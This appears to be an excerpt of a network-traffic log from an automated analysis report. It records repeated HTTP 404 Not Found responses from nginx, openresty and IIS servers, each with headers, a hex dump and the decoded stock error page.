Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 11 Nov 2024 17:24:27 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/7.5X-Powered-By: ASP.NETDate: Mon, 11 Nov 2024 17:24:22 GMTContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 11 Nov 2024 17:24:27 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openresty/1.21.4.3Date: Mon, 11 Nov 2024 17:24:31 GMTContent-Type: text/htmlContent-Length: 561Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.21.4.3</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openresty/1.21.4.3Date: Mon, 11 Nov 2024 17:24:33 GMTContent-Type: text/htmlContent-Length: 561Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.21.4.3</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 11 Nov 2024 17:24:37 GMTContent-Type: text/htmlContent-Length: 138Connection: keep-aliveETag: "663ee226-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 11 Nov 2024 17:24:37 GMTContent-Type: text/htmlContent-Length: 138Connection: keep-aliveETag: "663ee226-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Mon, 11 Nov 2024 17:25:54 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/7.5X-Powered-By: ASP.NETDate: Mon, 11 Nov 2024 17:25:48 GMTContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Mon, 11 Nov 2024 17:25:54 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 